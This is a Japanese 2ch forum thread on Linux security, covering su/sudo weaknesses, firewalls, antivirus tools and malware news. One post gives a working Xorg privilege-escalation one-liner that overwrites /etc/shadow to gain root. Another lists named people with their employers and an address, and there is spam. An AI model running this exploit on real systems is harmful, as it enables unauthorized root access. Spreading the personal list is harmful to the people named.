Linuxセキュリティ総合スレ [無断転載禁止]©2ch.net

Linuxを安全に使うためにセキュリティについて語りましょう！

インターネットに繋がない

電源を入れない

気にしない

SAKOKU を使う

勝つためには戦わないこと(´・ω・`)

手始めにiptableから乗り換える話書けや

セキュリティ総合ってことはウィルス対策もここでいいよね？

そもそもLinux使うこと自体が対策に成り得る

サイバーノーガード戦法だ

nftの情報仕入れることを期待してたんだけど、セキュリティのスレなのな。
最近nftに移行はしたけど、iptableで指定した項目が全て移せたわけではないな〜。

重複
http://hayabusa6.2ch.net/test/read.cgi/linux/1150732249/

UACが欲しい(´・ω・｀)

代わりにキーリングをあげよう

ぱんつくれ !

make pan

残念ながらいくつかの解決が困難な問題のせいで今やUnix/LinuxよりWindowsのほうが遥かにセキュアだからな。
被害が少ないのはただ単に狙われてないからってだけ。

1.su/sudoが糞
glibcの脆弱性GHOSTの発見に関わった人のコメント

http://www.openwall.com/lists/owl-users/2004/10/22/2
> If it would be permitted for a non-root user to su to root, then anyone who could have compromised the user's account[1] would also be able to hijack a su session[2] and then su to root himself.
> [1] Such a compromise could occur in a variety of ways: Web/FTP/etc.
> client vulnerabilities, password snooping, etc.
> [2] For example, edit the user's shell startup scripts to make su an alias for a custom su wrapper program.

http://www.openwall.com/lists/owl-users/2004/10/20/6
> unfortunately both su and sudo are subtly but fundamentally flawed.
> So the separation between the non-root and the root accounts is lost.


suやsudoを使える非rootのアカウントが攻撃者に侵入された時点で、攻撃者はそのアカウントの~/.bashrcなどにパスワードを盗むラッパーを実際のsu/sudoのaliasやfunctionとして仕込んだり出来る。
次に正規のユーザーがsu/sudoを使おうとすると攻撃者の仕込んだラッパーが実行され攻撃者はパスワードを得ることが出来、あとは攻撃者もsu/sudoを使い放題となる。
結果としてこれらのツールのせいでrootと非rootというユーザーの分離という一番基本的なセキュリティさえ無意味になっている。

じゃけんSELinux使いましょうね

セキュリティ対策がはっきりしない以上Win使いしかいない
でもw10こわいわー

>>18
侵入された時点でおしまいだろうに何言ってんだこいつって感じですかね。

>>21
今の時代は｢侵入された時点でおしまい｣が許されないからこそブラウザとかはseccompやnamespaceを駆使して仮に脆弱性経由で何かコードが実行されても被害を最小限に食い止めるようにsandbox化に力を入れてたりするんだが
そもそもそれが許されるなら、一人で使うデスクトップ用途ではUbuntuみたいなわざわざ｢普段非rootでログインして必要な時だけsu/sudoでrootになって実行する｣
っていう行動にはセキュリティ的には何の意味もない、最初からrootでログインしてそのままエロサイト巡りしても何ら問題ないって事になるのは理解できるか？


もっとも昔はそれでも問題ないレベルだったのでWindowsではAdministratorでのログインがデフォになってたわけだが
そのあたりをきちんと理解しないで｢Unix/LinuxはWindowsよりセキュアなんですーー｣で思考停止してる馬鹿が大多数のせいで今の現状があるわけだ

その間にWindowsは、UACのように権限を得るためにはきちんとそれぞれへの入出力の機密性やコマンド自身の完全性をきちんと確保して｢異アカウント間の分離｣を破壊しないように考慮したり、
ILのように同アカウント内でもきちんとプロセス間を分離して保護(これは>>19の言うように強制アクセス制御で"一部"は解決できる)することでよりセキュアに進化した

一方残念ながら思考停止したUnix/Linuxは、権限を得るために｢何の保護もない環境｣から実行される｢何の保護もされてないsu/sudoコマンド｣に対して｢何の保護もされてない状態でパスワードを入力する事｣状態が放置され、
その一番基本的な｢異アカウント間の分離｣すら無意味になってる体たらく
結果的に｢(sudoが使える非rootユーザーが)侵入された時点で(システム全体が)おしまい｣になってるので、一周回ってお前の言ってることも正解なわけだがな

一応フォローしとくとLinux kernel自体は割ときちんと進化してるな、NXとかASLRとかYamaとかLSMとか

きちんと設定されてなかったり(互換性のせいで出来ない)、ユーザーランドが糞の寄せ集めなせいで台無しだが

うんそれはご説ごもっともなんだけどさ、ただ危ないぞって騒ぐだけじゃなくて被害に遭った卑近な例とか挙げられないのかな？
卑近なって言ってもあなたの身近な人じゃなくてネットで皆の目に触れるようなブログやフォーラムでいいんだ。
xpが終わる時にデスクトップLinuxがって騒いでから、Linuxといえどのほほんとしてられないってのはみんな思ってることなんだ。
だから知りたいのは、いかに危険か、ではなく、危険なブツに出くわした時にどうすべきか、出くわした人はどう対処したか、なんだよ。
開発に携わった人のブログやコラム見つけて危険だ危険だって焚き付けるのなんて思考停止してもできることだろ？
LinuxユーザーがWindowsは危険だと騒ぐのが思考停止ならWindowsユーザーがLinuxは危険だと騒ぐのもまた思考停止じゃないの？対策を示すとか何かしない限り。
まるで、ゲームのバグを見つけたからプランナーや開発者より自分の方が優秀だって威張ってるデバッガーみたいだよ君は。

>>24
俺みたいなゴミクズには解決する力も政治力もないから2chみたいな掃き溜めでグチってんのよ
Linux好きだから改善してほしいし、もし同じように問題だと感じる人が増えてくれれば改善される可能性も増すしね

そのために敢えて居丈高にLinuxに厳しくWindowsに甘く書いたんだ、ゴメン(´・ω・｀)

windowsが仮に安全つうのは
あることするには続きは窓操作も必要だからじゃね？(あるいは暗号のようなパス書かないと辿れないとか)
そういう不便さを有難くセキュリティーが強いというのかどうか

Windowsがセキュリティーを確保しているのは専業のベンダー各社が競争に晒されながら製品を開発しているからであって、Windows自身が特段セキュリティに優れる訳じゃない

https://blog.martin-graesslin.com/blog/2015/11/looking-at-the-security-of-plasmawayland/
KDEの開発の人とかちゃんといまのXやシェルとかの実行環境には問題があることを認めてどうしたら良いか考えてる人もいるんだよなー
でも自分の開発してるソフトウェアだけが対応してもshellとかの他のソフトウェアのせいでそれが無意味になっちゃったりで困ってる

強制アクセス制御だけでハッキングを防御できるの？できないの？
それと、強制アクセス制御のステータスってのは何らかのファイルにロギングされんの？

Linuxなんてのは宮大工が構築した接ぎ木細工のようなもの。
ノーガードきめこんで運用してたら、そりゃあ狙われた時に簡単にクラッシュしますがな。
（肝心な釘打ち無しで構築してるもんだから）
Windowsの世界ではねセキュリティソフト入れて丸投げしてるわけ。
但し、ユーザーの中には変わり者がいて、ノーガードな奴もいる訳、
まあ、他人ごとでどうなろうが知ったことじゃないが…

LinuxのTCPに脆弱性、トラフィックを乗っ取られる恐れ
http://www.itmedia.co.jp/enterprise/articles/1608/12/news047.html

>>31
すぐ更新されるから慌てなさんな

>>32
2012年からあった脆弱性がすぐに修正されるの？

すでにパッチは出ているぞい

大して重要じゃないと思われてたから放置されてただけで、
修正が難しいわけじゃないのだろう。

｢誰も気づかなかったけど2012年からひっそり存在していた物が今発見されてすぐに修正された｣
だろ

日本の官公庁のサーバのセキュリティってまともなの？

>>37
自分で確認したら？ガバガバだから。ただし、法令違反で引っ張られないように工夫しろよ。
官公庁はWindows serverじゃないの？

clamAVでは不安だお(´･ω･`)

>>40
なんでよ？シスコ様だぞ？

常駐じゃないと安心できないマン

常駐か駐留か進駐か それが問題である

ｷﾞﾌﾞﾐｰﾁｮｺﾚｰﾄ

尻|ωﾟ )┻┛身動きとれんのだが・・・

NOTIFY_SOCKET=/run/systemd/notify systemd-notify ""

最強のiptablesの設定をうぷしてくれる神いないの？

firewalldに乗り換えれ

>>48
乗り換えると最強になるの？

設定が簡単になるから、「設定をうぷしてくれ」とは思わなくなる

>>50
出て行く通信のフィルタを書くためには
結局IPTABLES書かなきゃいけないのはなおった？
なおったなら乗り換える。

顔がでかいなぁ・・・

(´・ω・´・ω・ω・｀）知らんがなトリオ

Linuxの方がWindowsよりもセキュアだっていうのは
過去の話なんすね。それなのに未だにLinuxを
安全って紹介してる所ばかりなのは何でですかね

Linuxで被害出たという報告は少ないでしょ
Windowsでは散々あるけど

使う奴のスキル/知識レベル次第だから、OSが解決できる問題じゃないよ

んだんだ !

clamとかselinuxとか、皆さん使っていますか？

マシンの使用用途によりけりだとは思いますが、
僕の自宅鯖はfail2banだけです。
有用な物や便利な物があれば教えて欲しいです。

他人のサーバ管理してるけど、
今までosの脆弱性突かれてどうこうてのは
無いなあ

過去10年起きたのは、全てユーザーの問題
クソみたいなパスワード突破されたとか、
ゴミみたいなコードからのインジェクションとかのみ

今年も夏を乗りきれず逝く小型PCがいるのでしょうね

誤爆失礼

openssl enc -e -aes256
で暗号化してたファイルが、急に、
openssl enc -d 〜
で開けなくなりました。

ファイルが壊れたかとめちゃくちゃ焦ったけど、
タイムスタンプは去年のまま変化なし。
本家から、1.0.2lを落としてコンパイルした実行ファイルからだと
問題なく開けたからファイルの問題ではない模様。
1.1.0のバグですか？
#確か2ヶ月前ぐらいだとパッケージインストールされている
1.1.0系でも問題なかったはずですが。

linux-mint(ubuntu16.04)です。

>>66
くだらねえ質問はここに書き込め！Part 228
http://hayabusa6.2ch.net/test/read.cgi/linux/1494314571/

で聞いたほうが良いと思う

>67
ありがとう。
次回からそうするわ。

ちなみに、今回のは下記参考に自己解決したっぽい。
-md md5付けたら、現行1.1.0でもファイル開けました。

https://github.com/fastlane/fastlane/issues/9542

https://unix.stackexchange.com/questions/344150/why-can-one-box-decrypt-a-file-with-openssl-but-another-one-cant

すまん誰か教えてくれ！

全くセキュリティーパッチを充てていないrhel6.1で、poodle対策をしなきゃいけないんだが、
設定変更だけで対処する場合は、ssl.confのcipherのところに -sslv3入れるだけで良い？

【 日立製作所 】焦土戦

セキュリティの基本は尖らないこと、目立たないこと。隠すこと。　バカ。

新名主　隆志 TIS [email protected]
色田　眞吾 日立製作所 [email protected]
八木　一暢 TIS [email protected]
水野　潤 ﾊﾏｺﾞﾑｴｲｺﾑ [email protected]
佐々木　優也 （首都圏第1支店案件） [email protected]
佐々木　健太 日立製作所 [email protected]
中野　洋行 NSSLCサービス [email protected]
永井　真祐子 富士ｿﾌﾄ [email protected]
品川区高輪3-25-33
都内のトイレに花子さんだ
日立の末端は、ただの派遣会社だからな。メーカーはどこも一緒か。。

誰でも簡単にパソコン1台で稼げる方法など
参考までに、
⇒　『宮本のゴウリエセレレ』 というブログで見ることができるらしいです。

グーグル検索⇒『宮本のゴウリエセレレ』

HRT6GIPYTB

僕の知り合いの知り合いができた副業情報ドットコム
関心がある人だけ見てください。
グーグルで検索するといいかも『ネットで稼ぐ方法　モニアレフヌノ』

BTBIK

【緊急】LinuxベースのルーターやNASに感染するマルウェア「VPNFilter」、54カ国50万台に感染か
http://hayabusa9.2ch.net/test/read.cgi/news/1527149278/l50

大問題じゃないか

Windowsのセキュリティにはうるさい犬厨もそっ閉じ。つまり、犬問題ｗ

suid付きXorgを使ったroot昇格法
https://www.exploit-db.com/exploits/45697/
cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su
xorgはフォントパスのリストをそのままログに書き込むことを利用してる
(shadowが上書きされるので試すならshadowのバックアップを取ってからどうぞ)

Linuxを狙うマルウェア「HiddenWasp」に注意　2019/05/31 06:55　後藤大地
https://news.mynavi.jp/article/20190531-833791/

Intezerは5月19日(米国時間)、Linuxシステムを標的とした新しいマルウェア「HiddenWasp」を
発見したと「Intezer - HiddenWasp Malware Stings Targeted Linux Systems」で伝えた。

このマルウェアは現在も活動を継続しており、主要なアンチウィルスシステムで検出することが
できないと指摘されている。発見されたHiddenWaspの主な特徴は以下の通り。

・Linuxマルウェアの多くは仮想通貨マイニングやDDoS攻撃に焦点を当てているが、HiddenWasp
は異なっている。HiddenWaspはトロイの木馬として設計されており、標的のシステムを純粋に
リモートコントロールするために開発されている
・HiddenWaspに感染しているユーザーはすでに標的型攻撃のターゲットになっている可能性が
高い
・HiddenWaspはMiraiやAzazelルートキットといった入手可能なオープンソース・マルウェア
から大量のソースコードが流用されている
・HiddenWaspは中国のマルウェアファミリーに強い類似性があるものの、帰属に関しては可能
性が低いと見られる

Intezerは、Linuxを標的としたマルウェアは時間の経過とともにますます複雑になり続けている
と指摘。現在、一般的な脅威でも検出率があまり高くないが、より高度な脅威はさらに検出率が
低いという。今後、Linuxを標的としたマルウェアはさらに検出が難しくなるおそれがあり、
注意が必要。

>>82
これはひどい

俺が唯一Linuxに移行できない理由がアンチウイルスソフトだからな
Windowsのノートンみたいに完璧なのがあれば、ノートン一つで完全に防げるけど、
Linuxにはこれがないからな

SophosAntiVirusがあるが、なぜか定義ファイルの更新が20日異常ないぞ(気のせい？)
RKHunter、Tripwire、Lynis、Firewallとかだけとかありえんだろ？

Linuxだから安全です。

ウィルス検体を各所に送り対応が早いとこは半日だったが
ノートンは3日後だったことがあった

>>83
毎日更新してるんじゃないかな

ノートンやトレンドマイクロが対応してない最新のウィルスを先んじて検出したことがあったし、古い日付になってる定義ファイルはベースとなるやつの日付だと思ってる。

$ sudo /opt/sophos-av/bin/savupdate
次のバージョンをアップデート中です - SAV: 9.15.1、エンジン: 3.74.2、データ: 5.63
Updating Sophos Anti-Virus....
Updating SAVScan on-demand scanner
Updating Virus Engine and Data
Updating Manifest
Update completed.
次のバージョンにアップデートしました - SAV: 9.15.1、エンジン: 3.74.2、データ: 5.63
sdds:SOPHOS からの Sophos Anti-Virus のアップデートに成功しました


$ sudo /opt/sophos-av/bin/savdstatus --version
Copyright 1989-2018 Sophos Limited. All rights reserved.
Sophos Anti-Virus = 9.15.1
ビルドのリビジョン = 2793374
脅威検出エンジン = 3.74.2
脅威データ = 5.63
検出脅威数 = 35620036
脅威データリリース日 = 2019年05月07日 00時00分00秒
前回アップデートを確認した日時 = 2019年06月02日 01時01分28秒


と脅威データリリース日がずっと5/7のままなんだよね
これでも最悪1日毎には更新してるのかね？
ノートンだと1時間に1回は更新してるっぽいけど
更新しててくれてると助かるのだが

>>85-86へね

>>85-86
ここ見たらやはり1日1回ぐらいは更新されてそう
実際俺のSophosは普通に6/2更新されてた

どうも"脅威データリリース日 = 2019年05月07日 00時00分00秒"と
ウイルス定義ファイル更新日は違うらしい

ウイルス定義ファイル更新日もちゃんと書けよ＞Sophos


Sophos Anti-Virus: ウイルス定義ファイル (IDE ファイル) が最新の状態にアップデートされているかどうかを確認する方法
https://community.sophos.com/kb/ja-jp/121984

野良アプリをたくさん入れるWindowsではウイルス検知ソフトが不可欠だね。

しかし、経験上、ウイルス検知ソフトはそれほど当てにできない。
世に知れ渡っていないウイルスが仕込まれていた場合に
ウイルス検知ソフトがそれを正しく検出してくれることはまれ。
何ヶ月か何年かあとになって改めてチェックしてみると検出される場合がある。
でもダウンロードあと、そこまで待ってインストールする人はいない。

>>82
これの元記事によるとvirustotalで引っかからない
https://www.intezer.com/wp-content/uploads/2019/05/pasted-image-0-1.png
つまりノートンだろうが何だろうが脅威としないで放置されるということ
感染経路はわからんが野良危険ということだろう

>>82
これは具体的にどう注意したらいいんだ？

やはり、Sophosのウイルス定義ファイル更新は1日1回はあるな
↓となってるから(途中に更新あったかは知らんが多分ないだろ)

昨日
<published>2019-06-02T13:03:35</published>
今日
<published>2019-06-03T13:07:34</published>

ソフォス個人情報入れないとダウン出来ないの？

>>95
全部、適当に入れればいいよ
メアドは@と.orgとか.comは入れないとだめだけど、これも適当で大丈夫

電話番号とか住所も？

電話番号、住所って書く欄あったっけ？
あったとしても、100%適当で通るよ
役職･法人名も適当でおk

国、県、郵便番号は日本、東京、1000000でおk

ちなみにLinux版はこれね
https://secure2.sophos.com/ja-jp/products/free-tools/sophos-antivirus-for-linux/download.aspx
https://www.sophos.com/ja-jp/products/free-tools/sophos-antivirus-for-linux.aspx

ここからいって普通に全部適当に入力しおわったら、自動でダウンロード始まるよ

>>98
都道府県がなぜか受け付けてくれない

>>99
先に国名で｢日本｣選んだら都道府県欄に▲▼が出て、普通にマウスクリックで｢Tokyo｣が選べるようになるでしょ

国名：　日本
都道府県：Tokyo
郵便番号：100-0000

で大丈夫だよ

>>100
▲▼が出てこない